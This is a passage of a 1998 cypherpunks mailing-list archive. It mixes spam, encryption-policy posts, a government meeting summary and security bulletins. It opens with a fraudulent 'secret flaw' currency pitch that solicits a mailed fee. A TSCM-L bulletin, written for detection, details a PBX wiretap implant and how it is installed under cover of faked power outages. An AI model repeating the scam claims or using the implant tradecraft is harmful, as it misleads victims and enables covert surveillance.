conversion for you, after that you can easily and quickly do this
on your own hundreds or even thousands of times every month.

            TAKE ADVANTAGE OF THIS "SECRET FLAW" !
******************************************************************

It is even more explosive than we have yet disclosed. While
currency does fluctuate daily, we can show you 'HOW TO CONVERT $99
INTO $588 AS MANY TIMES AS YOU WANT'. That means, you will be able
to EXCHANGE $99, AMERICAN LEGAL CURRENCY DOLLARS, FOR $580 OF THE
SAME. You can do this as many times as you wish, every day, every
week, every month. All very LEGAL and effortlessly!

It takes only 5 to 10 minutes each time you do this. You can do
this from home, office or even while traveling. All you need is
an access to a phone line and an address. Best of all, you can do
this from ANY CITY ON THIS EARTH!!!

Again, we must reiterate, anyone can do this and the source is
NEVER-ENDING. For as long as the global financial community
continues to use different currencies with varying exchange rates,
the "SECRET FLAW" will exist.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

As we said earlier , we will do the first transaction for you and
will show you exactly how to do this on your own, over and over
again!

The amount of exchange you would do each time is entirely up to
you. Working just 2 to 10 hours a week, you can soon join the list
of Millionaires who do this on a daily basis many times a day. The
transaction is so simple that even a high school kid can do it!

We at the World Currency Cartel would like to see a uniform global
currency backed by Gold. But, until then, we will allow a LIMITED
number of individuals worldwide to share in the UNLIMITED PROFITS
provided for by the world currency differentials.

We will espouse no more political views nor will we ask you to do 
so. We can say however, that our parent organization, NBT, benefits
greatly by the knowledge being shared, as we ourselves, along with
YOU, benefit likewise. Your main concern surely will be, 
how you will benefit.

As soon as you become a member, you will make transactions from
your home, office, by telephone or through the mail. You can
conduct these transactions even while traveling.

=================================================================
         Don't believe us? Experience it for yourself!
=================================================================

Unlike anyone else, we will assure you great financial freedom and
you will add to our quickly growing base of supporters and join
the list of MILLIONAIRES being created using this very "SECRET
FLAW" in the world currency market.

==================================================================

               DON'T ENVY US, JOIN US TODAY!!!

==================================================================

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

There is a one time membership fee of only $195. BUT, if you join
us by June 30, 1998, you can join us for only $25 administrative
cost. Your  important documents, instructions, contact name/address,
phone number and all other pertinent information will be mailed to
you  immediately. So take advantage of our Anniversary date and join
us today.

(If you are replying after June 30, you must pay $195.00 for the
membership fee. NO EXCEPTIONS, and no more E-mail inquiries please).

Upon becoming a member, you promise to keep all info. CONFIDENTIAL!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Should you choose to cancel your membership for any reason, you
must return all papers/documents for a refund within 60 days.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
**************************

        IMPORTANT:

**************************

1...Please write your name & mailing address VERY CLEARLY on a
piece of paper or index card.

2...Below your mailing address, please write your E-mail address
(optional).

3...At the top left hand corner, please write the words:

              "NEW MEMBER"

4...Attach a CHECK or MONEY ORDER for $25 + $5 for the shipping of
documents (TOTAL = $30.00) PAYABLE TO "NBT" and mail to:

                NBT
                PO BOX 1129
                UNION, NJ 07083-1129

*If outside US add an additional $10 (TOTAL = $40.00, International
Money Orders Only)

}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

Here are some more "Editorial Excerpts":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WALL STREET: "A discreet group of Americans, operating under the
guise of World Currency Cartel have recently begun making rumbles
in world finance market. While at this time, their game is not
completely known, they certainly will be watched by those making
major moves in the currency contracts".

FINANCIAL WEEK: "Watch them, monitor them, extract their knowledge
and try to become one of them. That is the soundest financial advice
we could give to anyone".

NATIONAL BUSINESS WEEKLY: "While this reporter has been left in
the cold as to its method of operation, we have been able to
confirm that 'World Currency Cartel' and its members are literally
amassing great fortunes overnight".

                                            END

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

We thankfully credit DIAMOND INT. for the content of this 
IMPORTANT ANNOUNCEMENT!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 7 Jun 1998 12:46:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PGP International Accused
Message-ID: <199806071407.KAA08652@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


There are accusations from Russia and France that
PGP International and Network Associates are
improperly and probably illegally refusing downloads
of PGP to legitimate users. 

   http://jya.com/pgpi-x-ru.htm

   http://jya.com/nai-x-fr.htm

Phil Zimmermann and the companies have been asked 
by the plaintiffs to explain why public affirmations of open 
access are contradicted by illegal restrictions.

Could this be due to pressure from US agencies or
legal counsel to comply with covert directives of the
nations to restrict access or pay the price of being
denied markets?

Maybe this is the way the Stewart Baker policy of encryption
duplicity is being spread from NSA to the marketeers: Public 
assurances of concern and covert arrangements with authority
to assure perpetuation of national security lockdown.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sat, 6 Jun 1998 17:44:27 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Queensland State Elections Live
Message-ID: <1.5.4.32.19980607003915.023003b4@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter

Bookmark this page:

http://www.gwb.com.au/onenation/qldstate/june13

We will be covering the state elections live from here on behalf of One Nation.

You will be able to participate in live IRC Chat (find out how now)

and

Follow stories and images as they unfold.

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 7 Jun 1998 12:40:45 -0700 (PDT)
To: Chris Wedgwood <cypherpunks@toad.com
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <e01acc58.35737d7c@aol.com>
Message-ID: <3.0.5.32.19980607123650.008cf970@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> << > Auto-Launch attached binaries in E-Mail <-- Can we say G**dT*mes?
>> It was my understanding, that the so-called GoodTimes virus was a farce,
>> apparently aimed at specific commercial spammers.
>G**dT*mes is a hoax.
>
>I'm talking about a bug in Outlook (Express?) that will execute code when
>email messages are opened.

G**dT*mes and its ilk are hoaxes, which infect the mind of some readers,
causing Fear and Panic, and propagating around like chain letters.
But the fear-causing part is the assertion that if you read the message,
it will execute on your computer and do Bad Scary Things.
In the case of G**dT*mes, this was bogus, but it doesn't have to be.

In a passive-mail-reader environment, this won't happen,
because there's no reason your mailreader will execute commands 
embedded in email, but if you've got a mail-reader that
executes scripts sent to it in the mail, you don't need the 
human reader's participation to spread things,
you just need to tell the mail-reader to propagate and then
do whatever payload you've sent along as well.

The IBM Christmas-Tree Virus didn't use Fear to execute -
it promised the readers an amusing animated Christmas Tree on their terminals
(back when that was still perceived as cool :-) and if the sucker ran it,
it ran its propagation phase before or during the animation.

And back when we used Real Terminals instead of emulators,
you could send a crafty escape sequence to an HP2621 or VT100
to stash material in a register or on the screen and
get it sent back to the computer.  If you made a good guess
about the environment, this was enough ("Quit mailreader, run /tmp/boom".)
There was an article in the SFChron or Oakland Trib in spring 1979
about how "hackers at Berkeley" discovered a security hole in
"the Unix, a computer made by DEC", which was really a terminal exploit.

How good is that VT100 emulator you're using to telnet to that shell account?
 .
	.
		.
			.
				.
					.
						.
							ESC[42m;
								.

									yeah, that was fake.....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usethe800number@mailexcite.com
Date: Sun, 7 Jun 1998 15:15:11 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Search Engines
Message-ID: <29348246_22149450>
MIME-Version: 1.0
Content-Type: text/plain




I saw your web site on the internet.  I work for
a company that specializes in submitting web sites
to search engines.  We can submit your web site to
over 350 of the world's best search engines for 
only $39.95!  All work is verified.  If you would
like to get more traffic to your web site feel
free to give me a call at our toll-free number 
listed below or order directly from our web site.

We are a U.S. Based company that does business
world wide.


Sincerely,

David Scott
(800) 484-2621 X5568
http://www.skymax.net/searchengines







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: net10@mail.domain-serv.com
Date: Sun, 7 Jun 1998 18:19:09 -0700 (PDT)
To: Internet_Presence@natmed.com
Subject: Don't Risk Losing That Great Domain Name!
Message-ID: <199806080049.RAA05067@outlook.domain-serv.com>
MIME-Version: 1.0
Content-Type: text/plain


*********************************************************************
Don't Risk Losing That Great Domain Name For 
Your Personal Or Business Use.
*********************************************************************

Register your Domain Name for a one time fee of $35.00.
Planet Net's Domain Registration Services will not only 
register your domain name, but for no monthly charge, 
allow you to use the Planet Net Name Service. When you 
are ready to post your web site or use your domain for 
mail, The decision is up to you; select another website 
hosting company or Host with Planet Net.  We'll even 
waive the set-up fees. Also available are packages with 
custom "under construction" pages and mail services allowing
you to use your new domain for e-mail.

Planet Net, the Internet's premier webmasters resource,
offers high performance Website Hosting and Dedicated 
Servers. Lightning fast 30 MB virtual web hosting packages 
starting at $19.99/Month. Reseller packages with domain hosting
as low as $10 /month All packages include bundles of free 
webmaster tools. 

Sign-up before June 30, 1998 and receive up to 3 Free months 
of web site hosting.

If you would like to check the availability of your domain name or 
learn more about Planet Net type the following address in your web browser.

http://www.serveramerica.com

See You On The Net!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 7 Jun 1998 21:39:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: President's Export Council advisors consider Encryption Policy
Message-ID: <199806080438.VAA05215@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Largely bureaucratic, but there may be some interesting nuggets.
 This is an advisory group to watch over exports in general, with a
 subcommittee that is chartered to watch over encryption issues.  --gnu]

			 EXECUTIVE SUMMARY
	PRESIDENT'S EXPORT COUNCIL SUBCOMMITTEE ON ENCRYPTION
			  APRIL 23, 1998
		      SUMMARY OF OPEN SESSION

The open session of the President's Export Council Subcommittee on
Encryption (PECSENC) was called to order at 8:30 a.m.  Mr. Adorjan noted
the Committee's mandate and described the framework and agenda of the
meeting.  He then described the proposed focus of the Subcommittee
working groups on U.S. regulation and legislation, international, and
technology.  He emphasized that the objective would be for each working
group to address the many subjects related to encryption export policy
from the perspective of the primary topic.  He noted that as the working
groups made progress on issues, they would bring recommendations for
decision to the entire Subcommittee.  He added that each working group
would issue individual reports or recommendations rather than waiting
for an integrated report of all three working groups.  He again noted
his hope that the work of the three groups be integrated further on in
the process.  He commented that there had been discussion of a fourth
group focused on law enforcement, but concluded that it would be more
valuable to integrate law enforcement issues into the work of the three
groups because of its impact on these areas.  He then described the
proposed list of working group participants and possible chairs, noting
that his goal was to get a balanced representation of members within
each group.  He said that during the afternoon breakout sessions, he
would like each working group to reach a set of decisions on the scope
and approach of its work plan, and the timetable for completion.

Mr. Adorjan then discussed how the PECSENC, as a Subcommittee of the
President's Export Council, would communicate any formal activity to the
Administration, noting that the process used by the PEC Subcommittee on
Export Administration (PECSEA) worked well.  He described this process,
and explained that any proposals to send reports or letters to the
Administration were submitted by the Subcommittee Chair to the PEC Chair
for distribution to Committee members, with the PEC staff coordinating
this effort.

Mr. Adorjan then commented on Mr. Stewart Baker's e-mail recommendation
to submit a letter urging the Administration to move forward on the
financial institutions regulation which had been pending.  He agreed
with Mr. Baker's assessment that the Subcommittee should focus not only
on long-term issues, but also intervene in short-term issues.  Mr.
Adorjan added that issuing a letter to the Administration with support
of PEC and Subcommittee members was an effective means of bringing a
topic to the forefront.  He then suggested that the working groups
address such time sensitive issues, as appropriate, and formulate
recommendations for circulation throughout the entire Subcommittee.  Mr.
Adorjan then asked for any comments with regard to the working group
activities.  As there were none, he turned to the issue of membership,
noting that the PECSENC had 23 members with approximately 30 total
members planned.  He added that at the previous meeting, members had
discussed the importance of having a cryptographer and insurance
industry representative as members.  He assured members that the
department was pursuing these recommendations.

At the request of Subcommittee members, Under Secretary Reinsch
discussed Secretary Daley's recent remarks to a group of information
technology associations regarding the release of the Commerce Department
report titled "The Emerging Digital Economy."   Mr. Reinsch noted that
while the report focused on electronic commerce, the Secretary also took
the opportunity to comment on the encryption debate.  He emphasized that
the Secretary supported the President's policy to balance national
security, privacy, and commercial interests, but believed that
implementation of the policy had not been as successful as it should
be.  He added that if it could not be implemented successfully, the
victims would be the law enforcement community and U.S. business, as
foreign products would become more dominant.  With respect to the
ability of the United States to impact the activities of foreign
countries on encryption, Mr. Reinsch noted that each country that
confronted the issue had to work out the debate in its own way.
Responding to Mr. Lynn McNulty's request for views on the Economic
Strategy Institute's report entitled "Finding the Key, Reconciling
National and Economic Security Interests in Cryptography Policy", Mr.
Reinsch noted that while the report did not offer alternatives, it
demonstrated that balancing the competing interests in the debate was
difficult.

Mr. Adorjan then introduced the first presenter in the Justice
Department's threat assessment briefing, Mr. Charles Barry Smith,
Supervisory Special Agent, Office of Public and Congressional Affairs at
the Federal Bureau of Investigation.  Agent Smith began by stating that
law enforcement was supportive of strong encryption to protect privacy,
but that it would be adversely impacted by commercially available
non-recovery encryption products.  He discussed the legal issues related
to wiretapping, describing it as a technique of last resort done under
strict judicial procedures.  He then described the adverse impact of
non-recovery encryption on law enforcement's ability to perform search
and seizure of criminally related electronically stored data.  He
provided case examples where electronic surveillance had been used
successfully and described high-profile cases where encryption played a
role.  In response to Raymond Humphrey's question as to whether or not
criminals would use key recovery products, Agent Smith said that past
experience showed that criminals tended to use what was generally
available, citing the use of cellular phones as an example.  Ambassador
Katz raised the issue of whether it was too late to reverse the impact
of the general availability of non-key recovery encryption.  Agent Smith
responded that at this point encryption was just an added feature, but
would soon become integrated into products and user-friendly, resulting
in increased use.   In response to Ms. Simons' question of the issue of
domestic controls, Agent Smith noted that law enforcement was in fact
concerned about the proliferation of non-recovery products within the
United States, as well as the impact of imports of such products.  Agent
Smith emphasized that law enforcement did not advocate that the
government be the holder of the information or key, but that it have
access to information pursuant to lawful authority without having to go
to the individual who may be engaged in the illegal activity.

Adorjan then introduced the second Justice Department speaker, Mr. Scott
Charney, Chief of the Computer Crime and Intellectual Property Section
in the Criminal Division of the Justice Department.  Mr. Charney began
by commenting that his office was a large proponent of using
cryptography to protect systems for both authentication and privacy and
commerce purposes based on its experience with hacker cases.  He noted
that if information was encrypted, it was not as much of a concern if
hackers gained access to it.  He said that the question to ask was
whether the public wanted the kind of infrastructure that helped
criminals protect themselves because products were unbreakable and law
enforcement had no access to data, or the kind of infrastructure where
the public got the benefits of robust cryptography but where it did more
to preserve public safety.  Mr. Douglas McGowan asked about the method
of controlling keys for individual users of key recovery encryption
outside of the corporate environment.  Mr. Charney responded that there
were many ingenious ways to implement the technology which allow people
to retain control to information and keys while providing for government
access with the necessary authority.   He added that there were ways to
implement key recovery that offered benefits for the consumer and public
safety, and used the example of "self-wrapping" encryption.  Mr. Donald
Goldstein noted that there was evidence that the public was relatively
trusting and accepting of key management and recovery techniques, citing
the example of ATM card usage.  He cautioned that the network might
become unreliable if a vulnerability was introduced which could result
in the public not trusting the system anymore.  Mr. Chaney responded
that this vulnerability was far less than what existed in today's
plaintext world and that an expectation of zero risk on networks was not
realistic.  He added that there needed to be a balance of benefits and
risks and that it was difficult to quantify risks to privacy versus
public safety.

There was also a general discussion with Messrs. Smith and Charney on
related issues, including the concept of a "Net Center", the policies of
other countries, imports of non-recovery encryption, the difficulty in
designing different products in different markets, the possibility of a
single law enforcement standard, economic intelligence and espionage,
including losses to the economy if robust encryption was not available,
the need for real time access to encrypted communications,  and the
ability of law enforcement to solve crimes in the future if constrained
by non key-recovery encryption products.  Mr. Anthony Pentino of the
National Security Agency suggested that law enforcement might find a
better way to communicate its position beyond the congressional level to
the general public at large to counter what appeared to be an
exaggeration of privacy concerns fostered by its detractors.  Ms. Simons
then asked that in the future, the Subcommittee members have the
opportunity to submit questions to speakers.  Mr Adorjan suggested that
these questions be conveyed through the working groups.

Mr. Linton Wells from the Department of Defense commented that Deputy
Secretary of Defense John Hamre recently spoke to NATO allies in
Brussels regarding the importance of each country developing national
solutions on encryption.  He noted that Hamre's point was that
encryption needed to be regarded not just from commerce and law
enforcement standpoint, but as a national security issue as well.   As
NATO moved from military dedicated command and control to public
networks, strong identification, authentication, and interoperability
were crucial.   He also noted that with respect to the Defense
Department engaging in electronic commerce, key recovery encryption
would be necessary from an internal control standpoint.  Mr. Adorjan
agreed that this issue was not unique to the Defense Department, but
corporations as well.

Turning to the briefing foreign activities, Mr. Adorjan introduced Ms.
Michelle O'Neill, Executive Director to Ambassador Aaron and Mr. James
Lewis, Director of the Office of Strategic Trade and Foreign Policy
Controls.  Ms. O'Neill began by explaining that Ambassador Aaron, who
was unable to attend the meeting, had been appointed as Special Envoy
for Cryptography in November 1996.  The goal of his discussions with
other countries was international consensus on the development of key
management and key recovery architectures that would foster robust,
dependable security for global information infrastructure while
protecting public safety and national security.  She said that two key
issues were the need for harmonized export control policies and the
development compatible infrastructures, as it was clear that no widely
used encryption system or any successful national policy would be
possible without international cooperation.  She also noted that while
governments must provide appropriate policy framework, the task of
building this infrastructure would lie with the private sector.   She
said that through Ambassador Aaron's discussions, they had learned that
while most governments were behind the United States in development of
encryption policies, each shared the same concerns as the United States
in trying to strike the right balance.

Mr. Lewis' discussion focused on multilateral controls on encryption
exports.  He began by noting that a number of countries controlled the
export of encryption, but that the task was to modernize encryption
export controls to reflect today's environment and agree to the
implementation of common policies.  He added that most governments had
common concerns about role of encryption in society.  He noted that the
U.S. objectives with respect to encryption policy were law enforcement
access, use of recoverable encryption, and promotion of electronic
commerce.  He then explained the history and structure of Wassenaar
Arrangement and outlined the issues that the forum was considering with
respect to encryption, including moving to a positive control list,
consideration of the treatment of commercial encryption products given
widespread commercial use, treatment of software and intangible
technology (phone conversations, faxes, Internet transmissions),
decontrol levels, and transparency in reporting.  He said that the
United States had raised encryption as an issue for discussion at the
last Wassenaar Arrangement plenary in December 1997 and asked countries
to adopt similar policies as the United States.  He indicated that given
the scope of the issues under consideration, he was not sure that
resolution would happen anytime soon.  He added that Ambassador Aaron's
group was finding that other countries were moving slowly in the U.S.
direction and had more sympathy for the U.S.  position than it would
appear.  There was a general discussion of the issue of mass market
encryption software, the treatment of intangible technology and the need
to develop a common approach on encryption.

Following the lunch break and the meeting of the non-public working
group sessions, Chairman Adorjan reconvened the Subcommittee at 3:00
p.m.  He asked each group to give a report on its discussions and began
with Mr. Gant Redmon and the working group on technology.  Mr. Redmon
began by noting that the issue of interoperability was a key part of the
group's discussion and said that building key recovery was not an
impossible project (with respect to stored data).  He said that from a
technological standpoint, interoperability could cause a great deal of
difficulty in terms of those products that have key recovery and those
that do not.  He also noted the strong domestic impact of export issues
and other pressures to create encryption products a certain way.  With
respect to mass market software, he said that the working group
generally agreed that 56 bit encryption products were the de facto
standard.
Mr. Adorjan then turned to Ambassador Katz for a briefing on the
international working group discussion.   Katz noted that the first task
they agreed to focus on was developing an understanding of the state of
current encryption policies, including foreign availability and policies
of other governments.  He said that the working group would seek
briefings from government and the private sector and perhaps survey
suppliers and users.  He indicated that the group had identified another
issue:  whether export control policy is the most effective instrument
to meet broader objectives of law enforcement, national security, and
privacy.  He finished by noting that the working group planned on
completing its information gathering prior to the September meeting and
would then work on policy recommendations.

Mr. Adorjan then turned to the Regulatory and Legislative working
group.  Mr. Richard Barth began by noting that the working group had
considered the letter drafted by Mr. Baker and supported it with minor
edits.  He added that they felt that the issue of raising the decontrol
level to 56 bit encryption products could be included as a second
point.  He then noted that the group had agreed on a set of operating
principles for themselves and perhaps for the use of the entire
Subcommittee.  These included the objective of balancing the interests
of law enforcement, privacy and national, seeking this balance via
market driven forces and, where necessary, taking a legislative
approach.  He concluded with a request for a panel briefing on the
legislative environment and a briefing on the export control
requirements on encryption.

Adorjan agreed that briefings on three issues would be useful,
specifically briefings on the status of legislative issues, export
policies and administration, and international threat briefing by the
National Security Agency.  With respect to these briefings, he would ask
the presenters to provide topical outlines in advance of the briefings.
Mr. Adorjan said he looked forward to the working groups developing a
defined scope of work by the next meeting, and suggested that they
interact by e-mail.  He added that the working groups did not need to
get consensus, but that the long term objective was to formulate a set
of recommendations.  Finally, he noted that he and Under Secretary
Reinsch would invite Secretary Daley to participate at the June 22
meeting.  Mr. Adorjan asked if there were other issues to be discussed.
As there were none, he adjourned the session at 3:35 p.m.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hollyelliott@hotmail.com
Date: Mon, 8 Jun 1998 00:00:34 -0700 (PDT)
To: hollyelliott.hotmail.com@luc.ab.org
Subject: Take your business to the next level...
Message-ID: <198701171124.gbc hollyelliott@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




 Direct  E-mail  is  the  future  of  your  business  over  the  Internet.



 Reach  millions of  potential   customers,  imagine,  just  a  1%  return.



 We  are  the  professionals  of  the  e-mail  Industry. We  have  been  sending

 e-mail  for  two  years  with  no  interruptions.



 We  will  also  help  you   with  your  subject  line  and  letter.  NO CHARGE.



 We  guarantee  results. ( depending  on  what  you  are  marketing )



 CALL NOW  limit openings   1-800-600-0343  ext.1256



  



   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Atkinson, Comm-Eng" <jmatk@tscm.com>
Date: Sun, 7 Jun 1998 23:49:35 -0700 (PDT)
To: TSCM-L@tscm.com
Subject: TSCM-L Technical Security List
Message-ID: <v03110705b1a17d9226d8@[205.161.57.127]>
MIME-Version: 1.0
Content-Type: text/enriched


TSCM-L Technical Security List    Monday, June 8, 1998    Volume 1998
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Postings:           TSCM-L@tscm.com
Unsubscribe:   unsubTSCM-L@tscm.com
Subscribe:       subTSCM-L@tscm.com
Admin:		     jmatk@tscm.com

This material will only be sent to you upon your direct request, either by your 
email request, or by signing up via our web page. 

TSCM-L is published by Granite Island Group, and is written by James M. Atkinson.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

A telephone eavesdropping system was recently encountered which is being sold by a 
company in Pomezia, Italy. The system is for use on AT&T System 25, 75, and 85 PBX 
systems (other versions are available for 1030, 3070, Merlin, and Partner systems).

The first element of the system consists of a station card which has been built from 
scratch and appears almost identical to the original cards built by AT&T. There are 
no modifications on the card, and all components appear legitimate

The only visual difference between the cards is several additional integrated 
circuits, and discrete components. Additionally, on the silkscreen side of the card 
is a small logo consisting of an upper case letter E followed by a 7xx type of number 
(such as E-728). The logo will appear diagonally across the card from the serial 
number. Each station card will support 8 digital phones, and one outgoing circuit.

The second element of the system is the printed circuit board that goes into the 
actual telephone. Much like the station card the printed circuit board appears 
original but closer inspection will reveal a small number of extra components and 
PCB traces which go to the four pair position.

Suspect telephones will present an anomaly on the power and/or 4th pair. The 
signal is a digital data signal (usually 160 Kbps). Vector signal analysis will 
indicate a QAM/BPQSK cats-eye (a digital audio signal via a seven stage parasitic 
polynomial 1+x6+x7 algorithm). Waveform is a serial data stream, bipolar signal 
at roughly 700mV (680-715 mV depending on instrument). Power drain is fairly high 
(average of 136% over normal), but station card will not indicate an over-current 
condition or station error. 

Serial data stream is constant, and only affected by application of power. Signal 
stops if power is removed for more than 15 milliseconds. Disconnection of handset 
does not effect signal. Signal is present in both on-hook and off-hook conditions.

The third element of the system is a small modification to the PBX back plane which 
consists of two small wires which are tacked into place between the station card and 
the line card. This bridging circuit allows a T-Carrier signal to pass from the 
station card to an unused cable pair for an outgoing signal path (usually the 25th 
pair). This modification will appear to be a legitimate factory modification to the 
backplane.

The fourth element of the system is the transmission path back to the listening post 
(which will appear to be a T-1 signal, but will only use one cable pair). A RF 
transmitter could be used, however; such an emission would increase the possibility 
of the system being detected if used inside or near the target facility. A RF 
transmitter could be used once the signal is well outside the facility.

The transmission path will normally consist of a T-Carrier signal that can be traced 
to a facility demarcation point and then to an external cable pair. The signal will 
typically terminate at (or just prior to) an off-site SLC box. At this point the 
T-Carrier signal will be bridged back to a listening post either by hardwiring or 
an RF transmitter (though the use of a bridging capacitor to isolate the DC 
components of the circuit).

Faked power outages in the PBX or server room will typically be used to cover the 
installation activities. The installation consists of swapping the station card, 
and then installing the jumper wires on the back plane. While the power is still 
off the special printed circuit boards are installed into the target phones. 
Optionally, the telephone may simply be swapped with an instrument that has been 
modified in advance. Power is then restored with the event being logged as a short 
power outage (usually during bad weather or construction work).

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

French Magistrate Targets Official Wiretapper

PARIS, May 28 (Reuters) - A man who headed France's official wiretap
unit has been placed under investigation in connection with illegal
eavesdropping carried out on orders of the late President Francois
Mitterrand's office, judicial sources said on Thursday.

Army Brigadier General Pierre Charroy, 63, was ordered placed under
investigation for complicity in invasion of privacy in his capacity as
head of the discreetly named Interministerial Control Group (GIC) under
Mitterrand, the sources said.

The GIC is officially entrusted with carrying out wiretaps on the orders
of magistrates in cases of espionage or serious crimes. The body is so
shrouded with secrecy that it is not known if Charroy still heads it.

Former Mitterrand aides acknowledged last year that the late president,
who ruled from 1981-1995, had ordered security officers attached to his
office to carry out illegal wiretaps on the telephone lines of lawyers,
journalists, politicians and at least one movie actress.

The justice sources said magistrate Jean-Paul Vallat suspected Charroy
of having aided the presidential wiretappers who acted without the
permission of magistrates, making their actions illegal.

Prime Minister Lionel Jospin pledged in last year's general election
campaign to end an era of "monarchical secrecy" if he came to power and
to lift the lid on cases like possible illegal wiretapping under
Mitterrand, with whom Jospin was on poor terms.

Jospin has since been accused of dragging his feet on the promise since
he became prime minister and judge Vallat has written to ask for his
help in his probes.

Some 15 former Mitterrand aides are under investigation and could face
possible trial in the case.

Mitterrand died in 1996, seven months after leaving office.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The following pages which contain TSCM equipment reviews have been 
updated and are now available:

http://www.tscm.com/tmdespect.html

http://www.tscm.com/tmdeantenna.html

http://www.tscm.com/fluke785.html

http://www.tscm.com/tmdenljd.html

http://www.tscm.com/tmdedemod.html

http://www.tscm.com/tmdeacous.html

http://www.tscm.com/tmdeanc.html

http://www.tscm.com/tmdeaux.html

http://www.tscm.com/tmdecraft.html

http://www.tscm.com/tmdephot.html

http://www.tscm.com/tmdephys.html

http://www.tscm.com/tmdescope.html

http://www.tscm.com/tmdesets.html

http://www.tscm.com/tmdetdr.html

http://www.tscm.com/tmdevehcl.html

http://www.tscm.com/tmdevideo.html

http://www.tscm.com/tmdevom.html

http://www.tscm.com/tmdevsa.html

http://www.tscm.com/intercept1.html

http://www.tscm.com/reioscor.html

http://www.tscm.com/spectan.html

http://www.tscm.com/tmde.html

http://www.tscm.com/training.html

http://www.tscm.com/trainingciv.html

http://www.tscm.com/traininggov.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Granite Island Group
Mission and Purpose Statement

Granite Island Group provides expert technical, analytical and research

capability for the detection, nullification, and isolation of eavesdropping 
devices, technical surveillance penetrations, technical surveillance 
hazards, and physical security weaknesses.

Detection: Measures taken to detect technical surveillance devices, 
technical security hazards, and physical security weaknesses that would

permit the technical or physical penetration of a facility.

Nullification: The process of neutralizing or negating technical devices 
employed by making the placement of such devices more difficult. This 
includes ensuring that a room is protected with adequate physical 
construction and security measures thus making the placement or use of

illegal listening devices ineffective.

Isolation: A method to deter, or make extremely difficult, the 
introduction of eavesdropping devices by establishing special security

areas, for the conduct of classified or sensitive activities. 


Granite Island Group also provides:

Vulnerability Analysis to provide senior management with guidelines for

the enhancement of security and reduction of the vulnerability of 
sensitive areas to the technical surveillance threat.

Design, Manufacture, and Sale of TSCM, signals intelligence, cryptographic, 
and related secure communications systems and devices.

Research and Development of technical systems, devices, and tradecraft

utilized by the intelligence community.

Development of Specialized Computer Software and Firmware.

Design and Installation of high performance computer networks and 
communications systems.

Disaster Preparedness Planning 

Intelligence Analysis and activities to determine the existence and 
capability of surveillance equipment being used against the United 
States Government, United States corporations, establishments, or 
persons. Special emphasis is given to detecting and countering espionage 
and other threats and activities directed by foreign intelligence services.

Specialized Training for those in sensitive positions concerning the 
threat of technical surveillance and the part they can play in the TSCM

program. This includes advanced training and seminars for TSCM teams and 
technical security personnel.

Closed Enrollment Training regarding technical security and protective

related issues.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Copyright (c)1998 Granite Island Group. All Rights Reserved.




=======================================================================
Everybody's into computers... Who's into yours?
=======================================================================
James M. Atkinson                             Phone: (978) 546-3803
Granite Island Group - TSCM.COM
127 Eastern Avenue #291                        http://www.tscm.com/
Gloucester, MA 01931                               jmatk@tscm.com
=======================================================================
Do not try the patience of Wizards,
for they are subtle and quick to anger.
=======================================================================



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 8 Jun 1998 01:45:20 -0700 (PDT)
To: Cypherpunks@toad.com (cool dudes)
Subject: Amway and Brave Combo Evidence Update
Message-ID: <81aeaeca.357ba471@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


On that page I point to with the X-tian fish discussion, I linked the
"moderator nazi" with the right-wing because of his use of this symbol "&" to
replace the "And" in "Andy".  I have come to learn, it's got 2 meanings.  It
looks like the symbol for the "Know-nothing" movement is - "K & N".  Of
course, to know the significance of that, you have to know something about the
"Know-nothing" movement.  I think anyone that's ever observed many of the
lists around, will see some remarkable similarities.  Check this out -
====
Know-nothing (1827) 1 a : IGNORAMUS b: AGNOSTIC 2 cap K & N : a member of a
